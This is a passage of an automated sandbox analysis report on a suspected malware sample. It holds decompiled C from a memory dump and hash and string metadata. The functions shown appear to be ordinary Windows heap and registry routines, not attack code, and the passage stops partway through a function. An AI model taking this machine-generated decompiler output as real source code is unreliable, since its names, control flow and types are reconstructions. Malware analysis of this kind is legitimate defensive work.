                                                        0x00000000
                                                        0x01809ab8
                                                        0x01809aba
                                                        0x01809abc
                                                        0x01809ac8
                                                        0x01809ac8
                                                        0x00000000
                                                        0x01809abe
                                                        0x01809abe
                                                        0x01809ac0
                                                        0x00000000
                                                        0x01809ac0
                                                        0x01809abc
                                                        0x01809ad2
                                                        0x00000000
                                                        0x01809ad2
                                                        0x01809aab

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 4fd8d5b02999f95bc848cd232a22949f7beabf0c28bdee21766fed6ed8628cc0
                                                        • Instruction ID: fe16fcd005d06f467f042a15b9997aefab1bdd879efd4773fa1de9a60b431d6e
                                                        • Opcode Fuzzy Hash: 4fd8d5b02999f95bc848cd232a22949f7beabf0c28bdee21766fed6ed8628cc0
                                                        • Instruction Fuzzy Hash: CD22C070A002469FEB65DF2DC898B7ABBF5EF44708F18855DE845CB286E734DA80CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180B477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E0180B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x18dd360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0180B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E0182B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x18d8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E017EB150();
						} else {
							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E017EB150();
						__eflags =  *0x18d7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E018A2073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x18d8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x18db1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E01829730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E018AA80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E01829660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E018A138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0189FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E018AA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E018AA80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E01807D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E018A1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E01807D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E018A1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0180B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0180BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E018AA80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                        0x0180b486
                                                        0x0180b48a
                                                        0x0180b48e
                                                        0x0180b491
                                                        0x0180b493
                                                        0x0180b49a
                                                        0x0180b49c
                                                        0x0180b4a2
                                                        0x0180b4a7
                                                        0x0180b6fc
                                                        0x0180b6fc
                                                        0x0180b6b3
                                                        0x0180b6c3
                                                        0x0180b6c3
                                                        0x0180b4b4
                                                        0x0185294f
                                                        0x01852951
                                                        0x01852957
                                                        0x0185295d
                                                        0x01852961
                                                        0x01852980
                                                        0x01852985
                                                        0x01852963
                                                        0x01852978
                                                        0x0185297d
                                                        0x0185298b
                                                        0x01852990
                                                        0x01852995
                                                        0x0185299d
                                                        0x018529a1
                                                        0x018529a2
                                                        0x018529a2
                                                        0x018529a7
                                                        0x018529a7
                                                        0x01852951
                                                        0x0180b4ba
                                                        0x0180b4ba
                                                        0x0180b4bd
                                                        0x0180b4c2
                                                        0x0180b6d4
                                                        0x0180b4c8
                                                        0x0180b4c8
                                                        0x0180b4c8
                                                        0x0180b4cd
                                                        0x0180b4d0
                                                        0x0180b4d9
                                                        0x0180b4df
                                                        0x0180b4e2
                                                        0x018529b7
                                                        0x018529bd
                                                        0x00000000
                                                        0x0180b4e8
                                                        0x0180b4e8
                                                        0x0180b4ef
                                                        0x0180b4fa
                                                        0x0180b703
                                                        0x0180b709
                                                        0x0180b70b
                                                        0x0180b711
                                                        0x0180b711
                                                        0x0180b70b
                                                        0x0180b503
                                                        0x0180b50c
                                                        0x0180b511
                                                        0x0180b514
                                                        0x0180b519
                                                        0x018529c5
                                                        0x018529c7
                                                        0x018529cc
                                                        0x018529cd
                                                        0x018529cf
                                                        0x018529d0
                                                        0x018529d2
                                                        0x018529d7
                                                        0x018529d9
                                                        0x018529ee
                                                        0x018529ee
                                                        0x018529f4
                                                        0x018529fa
                                                        0x01852a01
                                                        0x00000000
                                                        0x01852a01
                                                        0x018529db
                                                        0x018529df
                                                        0x00000000
                                                        0x00000000
                                                        0x018529e1
                                                        0x018529e4
                                                        0x00000000
                                                        0x00000000
                                                        0x018529e6
                                                        0x018529e6
                                                        0x0180b51f
                                                        0x0180b51f
                                                        0x0180b520
                                                        0x0180b525
                                                        0x0180b52b
                                                        0x0180b52d
                                                        0x0180b52e
                                                        0x0180b530
                                                        0x0180b535
                                                        0x0180b53b
                                                        0x0180b53d
                                                        0x01852a07
                                                        0x00000000
                                                        0x01852a07
                                                        0x0180b549
                                                        0x0180b54e
                                                        0x01852a12
                                                        0x01852a15
                                                        0x00000000
                                                        0x00000000
                                                        0x01852a24
                                                        0x0180b559
                                                        0x0180b55c
                                                        0x01852a34
                                                        0x01852a3b
                                                        0x01852a4d
                                                        0x01852a4d
                                                        0x01852a3b
                                                        0x0180b566
                                                        0x0180b56b
                                                        0x0180b56f
                                                        0x0180b57b
                                                        0x0180b582
                                                        0x01852a57
                                                        0x01852a5c
                                                        0x01852a5c
                                                        0x0180b582
                                                        0x0180b58b
                                                        0x0180b58e
                                                        0x0180b592
                                                        0x0180b596
                                                        0x0180b599
                                                        0x0180b59b
                                                        0x0180b59e
                                                        0x0180b5a3
                                                        0x0180b5a6
                                                        0x0180b5a9
                                                        0x01852a66
                                                        0x01852a67
                                                        0x01852a73
                                                        0x01852a78
                                                        0x0180b5b8
                                                        0x0180b5b8
                                                        0x0180b5bb
                                                        0x0180b5bd
                                                        0x0180b5bd
                                                        0x0180b5c4
                                                        0x0180b5f7
                                                        0x0180b5f7
                                                        0x0180b600
                                                        0x0180b606
                                                        0x0180b60c
                                                        0x0180b612
                                                        0x0180b618
                                                        0x0180b621
                                                        0x0180b623
                                                        0x0180b629
                                                        0x0180b629
                                                        0x0180b62c
                                                        0x0180b62f
                                                        0x0180b633
                                                        0x0180b636
                                                        0x0180b639
                                                        0x0180b71d
                                                        0x0180b720
                                                        0x0180b736
                                                        0x0180b660
                                                        0x0180b660
                                                        0x0180b662
                                                        0x0180b665
                                                        0x0180b66a
                                                        0x0180b6e6
                                                        0x0180b6e7
                                                        0x0180b6ea
                                                        0x0180b6ef
                                                        0x01852ad1
                                                        0x01852ad2
                                                        0x01852ad8
                                                        0x01852add
                                                        0x01852add
                                                        0x0180b6f5
                                                        0x0180b6f5
                                                        0x0180b672
                                                        0x0180b675
                                                        0x0180b67a
                                                        0x01852ae5
                                                        0x01852ae8
                                                        0x00000000
                                                        0x00000000
                                                        0x01852af4
                                                        0x01852afc
                                                        0x00000000
                                                        0x0180b680
                                                        0x0180b680
                                                        0x0180b680
                                                        0x0180b685
                                                        0x0180b687
                                                        0x0180b68a
                                                        0x01852b06
                                                        0x01852b0c
                                                        0x01852b13
                                                        0x01852b1e
                                                        0x01852b20
                                                        0x01852b2b
                                                        0x01852b2b
                                                        0x01852b2b
                                                        0x01852b34
                                                        0x01852b45
                                                        0x01852b45
                                                        0x01852b13
                                                        0x0180b696
                                                        0x0180b69b
                                                        0x0180b6a0
                                                        0x01852b4f
                                                        0x01852b52
                                                        0x00000000
                                                        0x00000000
                                                        0x01852b61
                                                        0x00000000
                                                        0x0180b6a6
                                                        0x0180b6a6
                                                        0x0180b6a6
                                                        0x0180b6a8
                                                        0x0180b6ab
                                                        0x01852b70
                                                        0x01852b72
                                                        0x01852b7d
                                                        0x01852b7d
                                                        0x01852b7d
                                                        0x01852b86
                                                        0x01852b97
                                                        0x01852b97
                                                        0x0180b6b1
                                                        0x00000000
                                                        0x0180b6b1
                                                        0x0180b6a0
                                                        0x0180b67a
                                                        0x0180b722
                                                        0x0180b722
                                                        0x0180b655
                                                        0x0180b65d
                                                        0x00000000
                                                        0x0180b5c6
                                                        0x0180b5c6
                                                        0x0180b5ce
                                                        0x01852a83
                                                        0x01852a97
                                                        0x01852a97
                                                        0x01852a9a
                                                        0x00000000
                                                        0x00000000
                                                        0x01852a88
                                                        0x01852a8a
                                                        0x01852a8c
                                                        0x01852a8f
                                                        0x01852a92
                                                        0x01852aa1
                                                        0x01852aa1
                                                        0x01852aa2
                                                        0x01852aab
                                                        0x01852ab0
                                                        0x00000000
                                                        0x01852ab0
                                                        0x01852a94
                                                        0x01852a94
                                                        0x00000000
                                                        0x01852a9c
                                                        0x0180b5d4
                                                        0x0180b5d4
                                                        0x0180b5d6
                                                        0x0180b5d9
                                                        0x0180b5de
                                                        0x0180b5e1
                                                        0x0180b5e4
                                                        0x01852ab8
                                                        0x01852ab9
                                                        0x01852ac4
                                                        0x01852ac9
                                                        0x0180b5f2
                                                        0x0180b5f2
                                                        0x0180b5f4
                                                        0x0180b5f4
                                                        0x00000000
                                                        0x0180b5e4
                                                        0x0180b5c4
                                                        0x0180b554
                                                        0x0180b554
                                                        0x00000000
                                                        0x0180b554

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: 7be0876f313bcd62ff2b734cc3091c8d7418e2ae3aac732aefec9a3d1f504d5b
                                                        • Instruction ID: 9ca3532b29160701b7ef7ad7f16cb1f01a154b2d35e36116abf7bba0dc22f77a
                                                        • Opcode Fuzzy Hash: 7be0876f313bcd62ff2b734cc3091c8d7418e2ae3aac732aefec9a3d1f504d5b
                                                        • Instruction Fuzzy Hash: D5E1AD7460060ADFDB6ACF68C894B7ABBB6FF44304F1441A9E512DB391DB34EA41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E8239 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E017E8239(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				char* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t94;
				char* _t99;
				intOrPtr _t118;
				intOrPtr _t122;
				intOrPtr _t125;
				short _t126;
				signed int* _t137;
				intOrPtr _t138;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t148;
				signed int _t150;
				signed int _t151;
				void* _t152;
				signed int _t154;

				_t149 = __edx;
				_v12 =  *0x18dd360 ^ _t154;
				_v564 = _v564 & 0x00000000;
				_t151 = _a4;
				_t137 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t150 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E017F6D30( &_v580, L"UseFilter") < 0) {
					L4:
					return E0182B640(_t89, _t137, _v12 ^ _t154, _t149, _t150, _t151);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_push(2);
				_push( &_v580);
				_push( *_t137);
				_t89 = E01829650();
				if(_t89 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t89 = 0;
					} else {
						_t94 =  *_t151;
						_t151 =  *(_t151 + 4);
						_v588 = _t94;
						_v584 = _t151;
						if(E017F6D30( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(E017FAA20( &_v560,  &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t151 + 8;
						}
						_t99 =  &_v560;
						_t143 = 0;
						_v596 = _t99;
						_v600 = 0;
						do {
							_t149 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t99);
							_push(0);
							_push(_t143);
							_push( *_t137);
							_t151 = E01829820();
							if(_t151 < 0) {
								goto L37;
							}
							_t145 = _v596;
							_v580 =  *((intOrPtr*)(_t145 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t145 + 0xc));
							_v576 = _t145 + 0x10;
							_v636 =  *_t137;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t151 = E01829600();
							if(_t151 < 0) {
								goto L37;
							}
							_t151 = E017F6D30( &_v580, L"FilterFullPath");
							if(_t151 < 0) {
								L36:
								_push(_v564);
								E018295D0();
								goto L37;
							}
							_t138 = _v592;
							_t118 = _v568;
							do {
								_push( &_v572);
								_push(_t118);
								_push(_t138);
								_push(2);
								_push( &_v580);
								_push(_v564);
								_t152 = E01829650();
								if(_t152 == 0x80000005 || _t152 == 0xc0000023) {
									if(_t150 != 0) {
										L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
									}
									_t147 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t122 =  *0x18d7b9c; // 0x0
										_t150 = E01804620(_t147, _t147, _t122 + 0x180000, _v572);
										if(_t150 == 0) {
											goto L25;
										}
										_t118 = _v572;
										_t138 = _t150;
										_v596 = _t150;
										_v568 = _t118;
										goto L27;
									} else {
										_t150 = 0;
										L25:
										_t151 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t118 = _v568;
								}
								L27:
							} while (_t151 == 0x80000005 || _t151 == 0xc0000023);
							_v592 = _t138;
							_t137 = _v608;
							if(_t151 >= 0) {
								_t148 = _v592;
								if( *((intOrPtr*)(_t148 + 4)) != 1) {
									goto L36;
								}
								_t125 =  *((intOrPtr*)(_t148 + 8));
								if(_t125 > 0xfffe) {
									goto L36;
								}
								_t126 = _t125 + 0xfffffffe;
								_v616 = _t126;
								_v614 = _t126;
								_v612 = _t148 + 0xc;
								if(E017F9660( &_v588,  &_v616, 1) == 0) {
									break;
								}
								goto L36;
							}
							_push(_v564);
							E018295D0();
							_t65 = _t151 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t151 = _t151 &  ~_t65;
							L37:
							_t99 = _v596;
							_t143 = _v600 + 1;
							_v600 = _t143;
						} while (_t151 >= 0);
						if(_t150 != 0) {
							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
						}
						if(_t151 >= 0) {
							_push( *_t137);
							E018295D0();
							 *_t137 = _v564;
						}
						_t85 = _t151 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t89 =  ~_t85 & _t151;
					}
					goto L4;
				}
				if(_t89 != 0xc0000034) {
					if(_t89 == 0xc0000023) {
						goto L3;
					}
					if(_t89 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

















































                                                        0x017e8239
                                                        0x017e824b
                                                        0x017e824e
                                                        0x017e825d
                                                        0x017e8260
                                                        0x017e826e
                                                        0x017e8275
                                                        0x017e827b
                                                        0x017e827d
                                                        0x017e8287
                                                        0x017e8294
                                                        0x017e82ce
                                                        0x017e82de
                                                        0x017e82de
                                                        0x017e829c
                                                        0x017e829d
                                                        0x017e82a8
                                                        0x017e82a9
                                                        0x017e82b1
                                                        0x017e82b2
                                                        0x017e82b4
                                                        0x017e82bb
                                                        0x01842dfa
                                                        0x017e82cc
                                                        0x017e82cc
                                                        0x01842e19
                                                        0x01842e19
                                                        0x01842e1b
                                                        0x01842e1e
                                                        0x01842e30
                                                        0x01842e3d
                                                        0x00000000
                                                        0x00000000
                                                        0x01842e5a
                                                        0x01842e61
                                                        0x01842e68
                                                        0x01842e72
                                                        0x01842e72
                                                        0x01842e78
                                                        0x01842e7e
                                                        0x01842e80
                                                        0x01842e86
                                                        0x01842e8c
                                                        0x01842e8c
                                                        0x01842e92
                                                        0x01842e93
                                                        0x01842e99
                                                        0x01842e9a
                                                        0x01842e9c
                                                        0x01842e9d
                                                        0x01842ea4
                                                        0x01842ea8
                                                        0x00000000
                                                        0x00000000
                                                        0x01842eae
                                                        0x01842eb8
                                                        0x01842ec3
                                                        0x01842eca
                                                        0x01842ed1
                                                        0x01842edb
                                                        0x01842ee3
                                                        0x01842eef
                                                        0x01842efb
                                                        0x01842efc
                                                        0x01842f08
                                                        0x01842f12
                                                        0x01842f13
                                                        0x01842f22
                                                        0x01842f26
                                                        0x00000000
                                                        0x00000000
                                                        0x01842f3d
                                                        0x01842f41
                                                        0x01843069
                                                        0x01843069
                                                        0x0184306f
                                                        0x00000000
                                                        0x0184306f
                                                        0x01842f47
                                                        0x01842f4d
                                                        0x01842f53
                                                        0x01842f59
                                                        0x01842f5a
                                                        0x01842f5b
                                                        0x01842f5c
                                                        0x01842f64
                                                        0x01842f65
                                                        0x01842f70
                                                        0x01842f78
                                                        0x01842f84
                                                        0x01842f92
                                                        0x01842f92
                                                        0x01842f9d
                                                        0x01842fa2
                                                        0x01842fed
                                                        0x01843004
                                                        0x01843008
                                                        0x00000000
                                                        0x00000000
                                                        0x0184300a
                                                        0x01843010
                                                        0x01843012
                                                        0x01843018
                                                        0x00000000
                                                        0x01842fa4
                                                        0x01842fa4
                                                        0x01842fa6
                                                        0x01842fa6
                                                        0x00000000
                                                        0x01842fa6
                                                        0x01842fab
                                                        0x01842fab
                                                        0x01842fab
                                                        0x01842fab
                                                        0x01842fb1
                                                        0x01842fb1
                                                        0x01842fc1
                                                        0x01842fc7
                                                        0x01842fcf
                                                        0x01843020
                                                        0x0184302a
                                                        0x00000000
                                                        0x00000000
                                                        0x0184302c
                                                        0x01843034
                                                        0x00000000
                                                        0x00000000
                                                        0x01843036
                                                        0x01843039
                                                        0x01843040
                                                        0x0184304a
                                                        0x01843067
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01843067
                                                        0x01842fd1
                                                        0x01842fd7
                                                        0x01842fdc
                                                        0x01842fe4
                                                        0x01842fe6
                                                        0x01843074
                                                        0x0184307a
                                                        0x01843080
                                                        0x01843081
                                                        0x01843087
                                                        0x01843091
                                                        0x0184309f
                                                        0x0184309f
                                                        0x018430a6
                                                        0x018430a8
                                                        0x018430aa
                                                        0x018430b5
                                                        0x018430b5
                                                        0x018430b7
                                                        0x018430bf
                                                        0x018430c1
                                                        0x018430c1
                                                        0x00000000
                                                        0x01842dfa
                                                        0x017e82c6
                                                        0x01842ddd
                                                        0x00000000
                                                        0x00000000
                                                        0x01842de8
                                                        0x00000000
                                                        0x00000000
                                                        0x01842dee
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        • Opcode ID: fcde0fca8928631c2377217a1f15bf3348cce76cef084769f42dfa77b15cd473
                                                        • Instruction ID: 04b5940e29d25bf2516ee3383c81a1d006a07be6af0b800bb10b1cefc5499798
                                                        • Opcode Fuzzy Hash: fcde0fca8928631c2377217a1f15bf3348cce76cef084769f42dfa77b15cd473
                                                        • Instruction Fuzzy Hash: F0A129719116299BDB31DB68CC88BAAF7B8EF48714F1001E9EA08E7251DB359F84CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E0181AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
